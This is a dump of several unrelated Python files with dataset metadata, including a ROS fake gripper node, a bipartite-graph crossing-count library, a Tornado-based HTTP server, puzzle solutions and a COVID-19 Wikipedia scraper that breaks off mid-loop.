false_negatives_str = make_errors_str(false_negatives)
if len(false_negatives_str) == 0:
false_negatives_str = "None"
header_name = "CLASS" if self.multilabel else "LABEL"
output += (
" -------\n"
f"| {header_name}: {label}\n"
" -------\n\n"
"False Positives\n"
"***************\n\n"
f"{false_positives_str}\n\n"
"False Negatives\n"
"***************\n\n"
f"{false_negatives_str}\n\n"
)
return output
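The jitter expression in the chart code above is a Box-Muller transform written as a Vega expression: two uniform samples become one approximately Gaussian sample, scaled down by 1/32. A standalone numpy sketch of the same transform (numpy is assumed here; this is not part of the module above):

import numpy as np

rng = np.random.default_rng(0)
# Box-Muller: two independent uniforms -> one standard-normal sample.
# The lower bound on u1 avoids log(0); the /32 matches the Vega expression.
u1 = rng.uniform(1e-12, 1.0, size=10_000)
u2 = rng.uniform(0.0, 1.0, size=10_000)
jitter = np.sqrt(-2.0 * np.log(u1)) * np.cos(2.0 * np.pi * u2) / 32
print(jitter.mean(), jitter.std())  # approximately 0 and 1/32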
| 35.25
| 102
| 0.56506
| 1,603
| 13,818
| 4.700561
| 0.181535
| 0.029197
| 0.025216
| 0.013271
| 0.269542
| 0.190577
| 0.17213
| 0.148242
| 0.125415
| 0.11294
| 0
| 0.004316
| 0.345998
| 13,818
| 391
| 103
| 35.340153
| 0.829479
| 0.236793
| 0
| 0.194915
| 0
| 0.004237
| 0.108301
| 0.033371
| 0
| 0
| 0
| 0
| 0
| 1
| 0.063559
| false
| 0
| 0.025424
| 0.008475
| 0.194915
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ddbc20a9147b17ccfb31328be56cce367423b65a
| 791
|
py
|
Python
|
victor_fake_hardware_interface/scripts/fake_grippers_node.py
|
MMintLab/kuka_iiwa_interface
|
0dd258641377263e7275bc63f37cf32eb12f3e56
|
[
"BSD-2-Clause"
] | 5
|
2021-01-11T09:00:26.000Z
|
2021-12-13T15:59:01.000Z
|
victor_fake_hardware_interface/scripts/fake_grippers_node.py
|
MMintLab/kuka_iiwa_interface
|
0dd258641377263e7275bc63f37cf32eb12f3e56
|
[
"BSD-2-Clause"
] | 35
|
2020-07-01T14:48:40.000Z
|
2021-07-13T18:38:53.000Z
|
victor_fake_hardware_interface/scripts/fake_grippers_node.py
|
MMintLab/kuka_iiwa_interface
|
0dd258641377263e7275bc63f37cf32eb12f3e56
|
[
"BSD-2-Clause"
] | 1
|
2021-01-08T23:39:17.000Z
|
2021-01-08T23:39:17.000Z
|
#!/usr/bin/env python
import rospy
from victor_fake_hardware_interface.minimal_fake_arm_interface import MinimalFakeGripperInterface
def main():
rospy.init_node("minimal_fake_arm_interface")
interfaces = {}
arm_names = ["left_arm", "right_arm"]
for arm in arm_names:
interfaces[arm + "/gripper"] = MinimalFakeGripperInterface(gripper_command_topic=arm + "/gripper_command",
gripper_status_topic=arm + "/gripper_status")
for arm in arm_names:
interfaces[arm + "/gripper"].start_feedback_threads()
rospy.loginfo("Publishing data...")
rospy.spin()
for arm in arm_names:
interfaces[arm + "/gripper"].join_feedback_threads()
if __name__ == '__main__':
main()
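MinimalFakeGripperInterface itself is not shown in this file. Purely as an illustration of the shape such a class can take (a hypothetical sketch; the real implementation lives in victor_fake_hardware_interface.minimal_fake_arm_interface and presumably uses Victor-specific message types rather than std_msgs/String):

import threading
import rospy
from std_msgs.msg import String  # stand-in for the real gripper messages

class FakeGripperSketch:
    """Hypothetical stand-in, not the real MinimalFakeGripperInterface."""
    def __init__(self, gripper_command_topic, gripper_status_topic):
        self._status_pub = rospy.Publisher(gripper_status_topic, String, queue_size=1)
        self._cmd_sub = rospy.Subscriber(gripper_command_topic, String, self._on_command)
        self._done = threading.Event()
        self._thread = None

    def _on_command(self, msg):
        rospy.loginfo("fake gripper received command: %s", msg.data)

    def start_feedback_threads(self):
        def loop():
            rate = rospy.Rate(10)  # publish a fake status at 10 Hz
            while not rospy.is_shutdown() and not self._done.is_set():
                self._status_pub.publish(String(data="ok"))
                rate.sleep()
        self._thread = threading.Thread(target=loop)
        self._thread.start()

    def join_feedback_threads(self):
        self._done.set()
        self._thread.join()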
| 27.275862
| 114
| 0.652339
| 86
| 791
| 5.604651
| 0.44186
| 0.103734
| 0.049793
| 0.068465
| 0.224066
| 0.224066
| 0.224066
| 0.224066
| 0
| 0
| 0
| 0
| 0.241467
| 791
| 28
| 115
| 28.25
| 0.803333
| 0.025284
| 0
| 0.176471
| 0
| 0
| 0.161039
| 0.033766
| 0
| 0
| 0
| 0
| 0
| 1
| 0.058824
| false
| 0
| 0.117647
| 0
| 0.176471
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ddbc90c6ac864e7ce62505e078e39b8bc44056dd
| 11,647
|
py
|
Python
|
python/bgraph.py
|
brunodferrari/bdp
|
d320add1e451c85b6777ae34901bbd6fd3797114
|
[
"Unlicense"
] | null | null | null |
python/bgraph.py
|
brunodferrari/bdp
|
d320add1e451c85b6777ae34901bbd6fd3797114
|
[
"Unlicense"
] | null | null | null |
python/bgraph.py
|
brunodferrari/bdp
|
d320add1e451c85b6777ae34901bbd6fd3797114
|
[
"Unlicense"
] | null | null | null |
# -*- coding: utf-8 -*-
import numpy as np
import matplotlib.pyplot as plt
import networkx as nx
import pandas as pd
import copy
from numba import njit
from numba.typed import Dict, List
from numba.core import types
from concurrent.futures import ThreadPoolExecutor
np.seterr(over='ignore')
def pi(setlist, i):
try:
        return int(np.where(np.array(setlist) == i)[0])  # np.int was removed from numpy; use the builtin
except FutureWarning:
print(setlist, i)
except TypeError:
return -1
def crossing(G):
aux = G.edges().copy()
c = 0
while len(aux) > 0:
e1 = aux.pop(0)
i = e1[0]
k = e1[1]
for e2 in aux:
j = e2[0]
l = e2[1]
if (G.pi_1[i] < G.pi_1[j]) and (G.pi_2[k] > G.pi_2[l]) and (G.pi_1[i] * G.pi_1[j] * G.pi_2[k] * G.pi_2[l]):
c = c + 1
elif (G.pi_1[i] > G.pi_1[j]) and (G.pi_2[k] < G.pi_2[l]) and (G.pi_1[i] * G.pi_1[j] * G.pi_2[k] * G.pi_2[l]):
c = c + 1
return c
def _cross_n(G, e1, e2):
i = e1[0]
k = e1[1]
j = e2[0]
l = e2[1]
if (G.pi_1[i] < G.pi_1[j]) and (G.pi_2[k] > G.pi_2[l]) and (G.pi_1[i] * G.pi_1[j] * G.pi_2[k] * G.pi_2[l]):
return 1
elif (G.pi_1[i] > G.pi_1[j]) and (G.pi_2[k] < G.pi_2[l]) and (G.pi_1[i] * G.pi_1[j] * G.pi_2[k] * G.pi_2[l]):
return 1
return 0
def _cross_w(G, edgeslist):
e1 = edgeslist[0]
#with ThreadPoolExecutor(6) as ex:
output = list(map(lambda x: _cross_n(G, e1, x), edgeslist[1:]))
#output=0
#for e2 in edgeslist[1:]:
# output = output + _cross_n(G, e1, e2)
return sum(output)
def crossing2(G):
edgeslist = G.edges()
c = 0
with ThreadPoolExecutor(6) as ex:
output = list(ex.map(lambda x: _cross_w(G, x), [edgeslist[i:] for i in range(len(edgeslist))]))
return c + int(sum(output))
@njit
def _numba_cross(pi_1, pi_2, edgeslist):
c = 0
for s, e1 in enumerate(edgeslist):
i = e1[0]
k = e1[1]
for e2 in edgeslist[s+1:]:
j = e2[0]
l = e2[1]
if (pi_1[i] < pi_1[j]) and (pi_2[k] > pi_2[l]) and (pi_1[i] * pi_1[j] * pi_2[k] * pi_2[l]):
c = c + 1
elif (pi_1[i] > pi_1[j]) and (pi_2[k] < pi_2[l]) and (pi_1[i] * pi_1[j] * pi_2[k] * pi_2[l]):
c = c + 1
return c
def crossing3(G):
edgeslist = G.edges()
c = 0
pi_1 = Dict.empty(
key_type=types.int64,
value_type=types.int64,
)
pi_2 = Dict.empty(
key_type=types.int64,
value_type=types.int64,
)
pi_1.update(G.pi_1)
pi_2.update(G.pi_2)
output = _numba_cross(pi_1, pi_2, List(edgeslist))
return c + output
def bdp_lyt(G, size = 4/3, height = 100):  # build a layout suitable for plotting the graph
import numpy as np
#G, center = _process_params(G, center=center, dim=2)
#if len(G) == 0:
# return {}
#center = np.zeros(2)
top = G.v1()[::-1]
bottom = G.v2()[::-1]
height = 100
width = size * height
offset = (width/2, height/2)
nodes = top + bottom
left_xs = np.repeat(0, len(top))
right_xs = np.repeat(width, len(bottom))
left_ys = np.linspace(0, height, len(top))
right_ys = np.linspace(0, height, len(bottom))
top_pos = np.column_stack([left_xs, left_ys]) - offset
bottom_pos = np.column_stack([right_xs, right_ys]) - offset
pos = np.concatenate([top_pos, bottom_pos])
#pos = rescale_layout(pos, scale=scale) + center
pos = dict(zip(nodes, pos))
return pos
# plot the graph using the layout above
def plotBGraph(G, size = 4/3, height=100):
B = nx.Graph()
B.add_nodes_from(G.v1(), bipartite=1)
B.add_nodes_from(G.v2(), bipartite=2)
B.add_edges_from(G.edges())
pos = bdp_lyt(G, size, height)
nx.draw(B, pos)
nx.draw_networkx_labels(B, pos)
#plt.savefig("test.pdf")
#plt.show()
def bary_sort(barylist, nodelist):
aux = [(pos, v) for (pos, v) in zip(barylist, nodelist)]
aux.sort(key=lambda tup: tup[0])
    return list(np.array(aux)[:, 1].astype(int))  # np.int0 alias was removed from numpy
# find the barycenter of a vertex
def bary(G, v, v_layer = None):
b = 0
    if v_layer is None:
return
elif v_layer == 1:
pi_k = G.v2()
        K = [x for x in pi_k if (((v, x) in G.edges()) or ((x, v) in G.edges())) and G.pi_2[x] > 0]  # find the neighbours of v in the second layer
if len(K) > 0:
b = G.perm_v2(K).mean()
elif v_layer == 2:
pi_k = G.v1()
        #K = [x for x in pi_k if (x, v) in G.edges()]  # find the neighbours of v in the first layer
K = [x for x in pi_k if (((v, x) in G.edges()) or ((x, v) in G.edges())) and G.pi_1[x] > 0]
if len(K) > 0:
b = G.perm_v1(K).mean()
return b
@njit
def _deg(nodelist, subgraph, edges):
deg = Dict.empty(
key_type=types.int64,
value_type=types.int64,
)
for v in nodelist:
K = [x for x in subgraph if ((v, x) in edges) or ((x, v) in edges)]
deg[v] = len(K)
return deg
class BGraph:
""" aux """
def __init__(self):
self._set_v1 = []
self._set_v2 = []
self._set_edges = []
self.pi_1 = {}
self.pi_2 = {}
self._adj = {}
self._nodes = {}
@property
def adj(self):
return self._adj
def __getitem__(self, n):
return self.adj[n]
def edges(self, edgelist = None):
        if edgelist is not None:
self._set_edges = []
self._set_edges = edgelist
for e in edgelist:
u, v = e
if u not in self._nodes:
self._adj[u] = {}
self._nodes[u] = {}
if v not in self._nodes:
self._adj[v] = {}
self._nodes[v] = {}
datadict = self._adj[u].get(v, {})
self._adj[u][v] = datadict
self._adj[v][u] = datadict
else:
return self._set_edges
def v1 (self, setlist = None):
        if setlist is not None:
self._set_v1 = []
self._set_v1 = setlist
self.pi_1 = dict(zip(self._set_v1,self.perm_v1()))
for u in setlist:
if u not in self._nodes:
self._nodes[u] = {}
self._adj[u] = {}
else:
return self._set_v1
def v2 (self, setlist = None):
        if setlist is not None:
self._set_v2 = []
self._set_v2 = setlist
self.pi_2 = dict(zip(self._set_v2, self.perm_v2()))
for u in setlist:
if u not in self._nodes:
self._nodes[u] = {}
self._adj[u] = {}
else:
return self._set_v2
def perm_v1(self, pos = None):
        if pos is not None:
return np.vectorize(lambda i: self.pi_1[i])(pos)
else:
return np.vectorize(lambda i: pi(self._set_v1, i))(self._set_v1) + 1
def perm_v2(self, pos = None):
        if pos is not None:
return np.vectorize(lambda i: self.pi_2[i])(pos)
else:
return np.vectorize(lambda i: pi(self._set_v2, i))(self._set_v2) + 1
def order_v1(self):
#aux = [(pos, v) for (pos, v) in zip(self.pi_1, self. set_v1)]
aux = list( self.pi_1.items() )
aux.sort(key=lambda tup: tup[1])
        self.v1(list(np.array(aux)[:, 0].astype(int)))
return
def order_v2(self):
#aux = [(pos, v) for (pos, v) in zip(self.pi_2,self. set_v2)]
aux = list( self.pi_2.items() )
aux.sort(key=lambda tup: tup[1])
        self.v2(list(np.array(aux)[:, 0].astype(int)))
return
def add_v1(self, i, pos):
if pos != -1:
self._set_v1 = self.v1()[:pos] + [i] + self.v1()[pos:]
else:
self._set_v1 = self.v1()[:] + [i]
def add_v2(self, i, pos):
if pos != -1:
self._set_v2 = self.v2()[:pos] + [i] + self.v2()[pos:]
else:
self._set_v2 = self.v2()[:] + [i]
def n_v1(self):
#self.n_v1 = len(self.v1)
return len(self._set_v1)
def n_v2(self):
#self.n_v2 = len(self.v2)
return len(self._set_v2)
def n_edge(self):
return len(self._set_edges)
def n_v(self):
return len(self._nodes)
def density(self):
return len(self._set_edges) / (len(self._set_v1)*len(self._set_v2))
def n_cross(self):
return crossing3(self)
def bc(self, v, k):
return bary(self, v, k)
#@jit(nopython=True)
def degree(self, nodelist = None, subgraph = None):
#deg = {}
if nodelist is None:
nodelist = (self.v1() + self.v2())
if subgraph is None:
subgraph = (self.v1() + self.v2())
# for v in self.v1():
# K = [x for x in self.v2() if (v, x) in self.edges()]
# deg[v] = len(K)
# for v in self.v2():
# K = [x for x in self.v1() if (x, v) in self.edges()]
# deg[v] = len(K)
d = _deg(List(nodelist), List(subgraph), List(self.edges()))
return d
def move_v1(self, v, pos, inplace=False):
aux = self.pi_1.copy()
pos_v = aux.pop(v)
aux = np.array(list(aux.items()))
aux[ aux[:,1] >= pos_v, 1] = aux[ aux[:,1] >= pos_v, 1] - 1
aux[ aux[:,1] >= pos, 1] = aux[ aux[:,1] >= pos, 1] + 1
aux = dict(aux)
aux[v] = pos
if not inplace:
return aux
else:
self.pi_1 = aux
def move_v2(self, v, pos, inplace=False):
aux = self.pi_2.copy()
pos_v = aux.pop(v)
aux = np.array(list(aux.items()))
aux[ aux[:,1] >= pos_v, 1] = aux[ aux[:,1] >= pos_v, 1] - 1
aux[ aux[:,1] >= pos, 1] = aux[ aux[:,1] >= pos, 1] + 1
aux = dict(aux)
aux[v] = pos
if not inplace:
return aux
else:
self.pi_2 = aux
def plot(self, size=4/3, height=100, order=0):
if order:
self.order_v1()
self.order_v2()
plotBGraph(self, size=size, height=height)
def K(self, u, v):
i = u
j = v
#G.move_v1(i, j, True)
#G.move_v1(j, i, True)
c = 0
if u in self._set_v1:
pi = self.pi_2
elif u in self._set_v2:
pi = self.pi_1
#nodes_between = [v for v in G.pi_1 if G.pi_1[v] >= G.pi_1[i] and G.pi_1[v] <= G.pi_1[j]]
#while nodes_between:
# i = nodes_between.pop()
# for j in nodes_between:
#print(pi)
for k in self._adj[i]:
for l in self._adj[j]:
if (pi[k] > pi[l]):
c = c + 1
return c
def find_pos(self, u, pos):
if u in self._set_v1:
pi = self.pi_1
elif u in self._set_v2:
pi = self.pi_2
return [u for u in pi if pi[u] == pos][0]
def copy(self):
return copy.deepcopy(self)
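A small sanity check for the crossing counters above (assuming this module is importable; crossing3 additionally needs a working numba install): parallel edges produce no crossing, and swapping one pair of endpoints produces exactly one.

if __name__ == "__main__":
    G = BGraph()
    G.v1([1, 2])               # first layer: pi_1 = {1: 1, 2: 2}
    G.v2([3, 4])               # second layer: pi_2 = {3: 1, 4: 2}
    G.edges([(1, 3), (2, 4)])
    print(crossing(G))         # 0: the two edges are parallel

    H = BGraph()
    H.v1([1, 2])
    H.v2([3, 4])
    H.edges([(1, 4), (2, 3)])
    print(crossing(H))         # 1: the two edges cross once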
| 28.06506
| 145
| 0.479608
| 1,776
| 11,647
| 2.99268
| 0.109234
| 0.024835
| 0.01731
| 0.008467
| 0.457761
| 0.42032
| 0.358231
| 0.324929
| 0.270367
| 0.22032
| 0
| 0.042021
| 0.374775
| 11,647
| 415
| 146
| 28.06506
| 0.68786
| 0.099081
| 0
| 0.366782
| 0
| 0
| 0.000575
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.131488
| false
| 0
| 0.034602
| 0.034602
| 0.304498
| 0.00346
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ddbf5e2f65d38e783f4768e0ca9abc2a32d54029
| 3,403
|
py
|
Python
|
src/odin/http/server.py
|
stfc-aeg/odin-control
|
71ab2e6e6e1a7c7ce322ea0df31a9d675f7b92bf
|
[
"Apache-2.0"
] | 4
|
2018-05-24T13:38:23.000Z
|
2021-08-18T08:32:54.000Z
|
src/odin/http/server.py
|
stfc-aeg/odin-control
|
71ab2e6e6e1a7c7ce322ea0df31a9d675f7b92bf
|
[
"Apache-2.0"
] | 20
|
2018-04-10T09:28:01.000Z
|
2022-03-17T11:43:59.000Z
|
src/odin/http/server.py
|
stfc-aeg/odin-control
|
71ab2e6e6e1a7c7ce322ea0df31a9d675f7b92bf
|
[
"Apache-2.0"
] | 3
|
2017-06-07T13:28:38.000Z
|
2019-07-16T10:02:21.000Z
|
"""odin.http.server - ODIN HTTP Server class.
This module provides the core HTTP server class used in ODIN, which handles all client requests,
handing off API requests to the appropriate API route and adapter plugins, and defining the
default route used to serve static content.
Tim Nicholls, STFC Application Engineering
"""
import logging
import tornado.gen
import tornado.web
import tornado.ioloop
from tornado.log import access_log
from odin.http.routes.api import ApiRoute
from odin.http.routes.default import DefaultRoute
class HttpServer(object):
"""HTTP server class."""
def __init__(self, debug_mode=False, access_logging=None,
static_path='./static', adapters=None):
"""Initialise the HttpServer object.
:param debug_mode: Set True to enable Tornado debug mode
:param static_path: Set the path to static file content rendered by default route
:param adapters: list of adapters to register with API route
"""
settings = {
"debug": debug_mode,
"log_function": self.log_request,
}
        # Set up the access log level
if access_logging is not None:
try:
level_val = getattr(logging, access_logging.upper())
access_log.setLevel(level_val)
except AttributeError:
logging.error(
"Access logging level {} not recognised".format(access_logging)
)
# Create an API route
self.api_route = ApiRoute()
# Register adapters with the API route and get handlers
for adapter in adapters:
self.api_route.register_adapter(adapters[adapter])
        # Initialize adapters for all those that require inter-adapter communication
self.api_route.initialize_adapters()
handlers = self.api_route.get_handlers()
# Create a default route for static content and get handlers
default_route = DefaultRoute(static_path)
handlers += default_route.get_handlers()
# Create the Tornado web application for these handlers
self.application = tornado.web.Application(handlers, **settings)
def listen(self, port, host=''):
"""Listen for HTTP client requests.
:param port: port to listen on
:param host: host address to listen on
"""
self.application.listen(port, host)
def log_request(self, handler):
"""Log completed request information.
This method is passed to the tornado.web.Application instance to override the
default request logging behaviour. In doing so, successful requests are logged
at debug level rather than info in order to reduce the rate of logging under
normal conditions.
:param handler: currently active request handler
"""
if handler.get_status() < 400:
log_method = access_log.debug
elif handler.get_status() < 500:
log_method = access_log.warning
else:
log_method = access_log.error
request_time = 1000.0 * handler.request.request_time()
log_method("%d %s %.2fms", handler.get_status(),
handler._request_summary(), request_time)
def cleanup_adapters(self):
"""Clean up state of registered adapters.
"""
self.api_route.cleanup_adapters()
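A minimal way to stand the server up (an illustrative sketch; it assumes the odin package is importable and that an empty adapter dict is acceptable for serving static content only):

import logging
import tornado.ioloop
from odin.http.server import HttpServer

logging.basicConfig(level=logging.DEBUG)
server = HttpServer(debug_mode=True, access_logging="debug",
                    static_path="./static", adapters={})
server.listen(8888)
tornado.ioloop.IOLoop.current().start()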
| 35.447917
| 96
| 0.658537
| 416
| 3,403
| 5.269231
| 0.355769
| 0.032847
| 0.027372
| 0.024635
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.004841
| 0.271525
| 3,403
| 95
| 97
| 35.821053
| 0.879387
| 0.399647
| 0
| 0
| 0
| 0
| 0.039494
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.090909
| false
| 0
| 0.159091
| 0
| 0.272727
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ddc0751188e1d1856d4d69064affd55e5821f001
| 1,382
|
py
|
Python
|
leetcode/ds_stack_valid_parentheses.py
|
ngovindaraj/Python
|
edbcd302533bef81aa0c01e902e6081df58f383c
|
[
"MIT"
] | null | null | null |
leetcode/ds_stack_valid_parentheses.py
|
ngovindaraj/Python
|
edbcd302533bef81aa0c01e902e6081df58f383c
|
[
"MIT"
] | null | null | null |
leetcode/ds_stack_valid_parentheses.py
|
ngovindaraj/Python
|
edbcd302533bef81aa0c01e902e6081df58f383c
|
[
"MIT"
] | null | null | null |
# @file Valid Parentheses
# @brief Given a string containing just the characters '(', ')', '{', '}',
# '[' and ']', determine if the input string is valid.
# https://leetcode.com/problems/valid-parentheses/
import collections
'''
Given a string containing just the characters '(', ')', '{', '}', '[' and ']',
determine if the input string is valid.
The brackets must close in the correct order, "()" and "()[]{}" are all valid
but "(]" and "([)]" are not.
'''
# time complexity : O(n)
# space complexity: O(n)
def isValid(s):  # written here as a standalone function; on LeetCode this is a Solution method taking self
# Use a dictionary to match fwd and rev brackets
dct = {'(': ')', '{': '}', '[': ']'} # HashTable for fwd -> reverse braces
# For each fwd brace record corresponding reverse brace to match
stk = collections.deque()
for char in s:
if char in dct: # If char is fwd bracket
stk.append(dct[char]) # Append corresponding rev bracket
elif char in ')}]': # If char is rev bracket
if len(stk) == 0: # Ensure no extra rev brackets
return False
elif char != stk.pop(): # Verify rev bracket type
return False
else: # Found non fwd/rev bracket character
return False
return len(stk) == 0 # Ensure no extra fwd bracket
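A few checks taken straight from the problem statement, runnable once the function above is defined:

assert isValid("()")
assert isValid("()[]{}")
assert not isValid("(]")
assert not isValid("([)]")
assert isValid("([{}])")
print("all parentheses checks passed")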
| 40.647059
| 79
| 0.552822
| 166
| 1,382
| 4.60241
| 0.457831
| 0.052356
| 0.031414
| 0.057592
| 0.246073
| 0.246073
| 0.193717
| 0.193717
| 0.193717
| 0.193717
| 0
| 0.002128
| 0.319826
| 1,382
| 33
| 80
| 41.878788
| 0.810638
| 0.429812
| 0
| 0.2
| 0
| 0
| 0.01676
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.066667
| false
| 0
| 0.066667
| 0
| 0.4
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ddc0a159fdea30685a3e6c6f67386c3bf2f75073
| 3,746
|
py
|
Python
|
2016/round_1b/technobabble.py
|
laichunpongben/CodeJam
|
a048229bce1bc680dc85c8a69ef395a2f049732a
|
[
"Apache-2.0"
] | null | null | null |
2016/round_1b/technobabble.py
|
laichunpongben/CodeJam
|
a048229bce1bc680dc85c8a69ef395a2f049732a
|
[
"Apache-2.0"
] | null | null | null |
2016/round_1b/technobabble.py
|
laichunpongben/CodeJam
|
a048229bce1bc680dc85c8a69ef395a2f049732a
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
from __future__ import print_function
from collections import deque
def parse_and_sort_topics(topics):
topic_deque = deque(tuple(topic.split(' ')) for topic in topics)
word0s = [item[0] for item in topic_deque]
word1s = [item[1] for item in topic_deque]
topic_deque = deque(sorted(list(topic_deque),
key=lambda x: (word0s.count(x[0]) + word1s.count(x[1]),
word1s.count(x[1]),
word0s.count(x[0]))))
sorted_topics = []
while len(topic_deque) > 0:
topic = topic_deque.popleft()
sorted_topics.append(topic)
added_word0s = [item[0] for item in sorted_topics]
added_word1s = [item[1] for item in sorted_topics]
topic_deque = deque(sorted(list(topic_deque),
key=lambda x: (added_word0s.count(x[0]) + added_word1s.count(x[1]),
added_word1s.count(x[1]),
added_word0s.count(x[0]),
word0s.count(x[0]) + word1s.count(x[1]),
word1s.count(x[1]),
word0s.count(x[0]))))
return sorted_topics
def count_fake(topics):
word0_dict = {}
word1_dict = {}
real_count = 0
fake_count = 0
sorted_topics = parse_and_sort_topics(topics)
print(sorted_topics)
for topic in sorted_topics:
word0, word1 = topic
try:
word0_count = word0_dict[word0]
except KeyError:
word0_dict[word0] = 0
try:
word1_count = word1_dict[word1]
except KeyError:
word1_dict[word1] = 0
if word0_dict[word0] > 0 and word1_dict[word1] > 0:
fake_count += 1
else:
real_count += 1
word0_dict[word0] += 1
word1_dict[word1] += 1
return fake_count
if __name__ == '__main__':
import os
samples = [
['HYDROCARBON COMBUSTION',
'QUAIL BEHAVIOR',
'QUAIL COMBUSTION'],
['CODE JAM',
'SPACE JAM',
'PEARL JAM'],
['INTERGALACTIC PLANETARY',
'PLANETARY INTERGALACTIC'],
['BOUNDARY GRAVITY',
'BOUNDARY HERMENEUTICS',
'BOUNDARY TRANSGRESSION',
'QUANTUM GRAVITY',
'QUANTUM HERMENEUTICS',
'QUANTUM TRANSGRESSION',
'TRANSFORMATIVE GRAVITY',
'TRANSFORMATIVE HERMENEUTICS',
'TRANSFORMATIVE TRANSGRESSION'],
['GF CH',
'RO GI',
'YB GI',
'TD HI',
'YG HI',
'IZ NB',
'BQ TA',
'GF TP',
'GR WG',
'IZ ZD']
]
for sample in samples:
print(count_fake(sample))
data_files = ['C-small-practice']
for f in data_files:
with open(os.path.join(os.path.dirname(os.path.realpath(__file__)),
'{0}.in'.format(f)), 'r') as input_file:
lines = input_file.readlines()
            test_case_count = int(lines[0].replace('\n', ''))
test_cases = []
inputs = [line.replace('\n', '') for line in lines[1:]]
i = 0
while i < len(inputs):
n = int(inputs[i])
topics = inputs[i+1:i+n+1]
test_cases.append(topics)
i += n+1
i = 1
with open(os.path.join(os.path.dirname(os.path.realpath(__file__)),
'{0}.out'.format(f)), 'w') as output_file:
for test_case in test_cases:
print(i)
output_file.write('Case #{0}: {1}\n'.format(i, count_fake(test_case)))
i += 1
| 30.455285
| 95
| 0.509343
| 427
| 3,746
| 4.274005
| 0.274005
| 0.039452
| 0.039452
| 0.04274
| 0.294795
| 0.227397
| 0.161096
| 0.161096
| 0.161096
| 0.161096
| 0
| 0.032669
| 0.370796
| 3,746
| 122
| 96
| 30.704918
| 0.741621
| 0.005339
| 0
| 0.117647
| 0
| 0
| 0.114362
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.019608
| false
| 0
| 0.029412
| 0
| 0.068627
| 0.039216
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ddc4e2961bdd997e8ed912766a3c871b4f8b1cc7
| 3,306
|
py
|
Python
|
openmapi/globales.py
|
IgnacioPardo/mAPI-Provincias
|
812fc12bcc72d6aa28ab2e39af2d64d0aa68c86b
|
[
"MIT"
] | 4
|
2020-08-02T06:51:04.000Z
|
2022-03-22T21:31:44.000Z
|
openmapi/globales.py
|
Creativity-Hub/Open-mAPI
|
b7e0ee9acda424aec0e84513d8e968aa6ff5d7c5
|
[
"MIT"
] | null | null | null |
openmapi/globales.py
|
Creativity-Hub/Open-mAPI
|
b7e0ee9acda424aec0e84513d8e968aa6ff5d7c5
|
[
"MIT"
] | 1
|
2022-03-24T22:20:47.000Z
|
2022-03-24T22:20:47.000Z
|
import requests
from bs4 import BeautifulSoup
class Pais:
    def __init__(self, name, infectados=None, recuperados=None, fallecidos=None, activos=None):
        self.name = name
        # per-instance dict: a class-level dict here would be shared by every Pais
        self.casos = {}
        self.casos['infectados'] = infectados
        self.casos['recuperados'] = recuperados
        self.casos['fallecidos'] = fallecidos
        self.casos['activos'] = activos
#Updates case count for register
def update(self, registro, valor):
self.casos[registro] = valor
#Replaces all registers with new dict
def updateAll(self, new):
self.casos = new
#Returns register
def get(self, registro):
return self.casos[registro]
#Returns all registers
def getAll(self):
return self.casos
def __str__(self):
return self.name
def __repr__(self):
return self.name
def __iter__(self):
for registro in self.casos:
yield [registro, self.casos[registro]]
class Globales:
results = {}
registers_label = 'Empty'
def __init__(self):
self.results = {}
    # Count registered countries.
    def count(self):
        self.registers_label = str(len(self.results)) + ' registros.'
        return len(self.results)
def __str__(self):
return self.registers_label
def __repr__(self):
return self.registers_label
def __iter__(self):
for pais in self.results:
yield self.results[pais]
def load(self):
url = "https://en.wikipedia.org/wiki/COVID-19_pandemic_by_country_and_territory"
page = requests.get(url)
soup = BeautifulSoup(page.content, 'html.parser')
noise = soup.find('caption')
noise.decompose()
noise = soup.find_all('td', attrs={'style':'padding:0px 2px;'})
for td in noise:
td.decompose()
noise = soup.find_all('img')
for img in noise:
img.decompose()
noise = soup.find_all("tr", class_="sortbottom")
for tr in noise:
tr.decompose()
table = soup.find("table", class_="wikitable")
rows = table.find_all('tr')
cases, deaths, recov = [title.text.replace('\n', '').replace(',', '.') for title in rows[1].find_all('th')[1:6]][1:4]
active = int(cases.replace('.', '')) - (int(deaths.replace('.', ''))+int(recov.replace('.', '')))
self.results['world'] = Pais('world', cases, recov, deaths, active)
rows = rows[2:]
for row in rows:
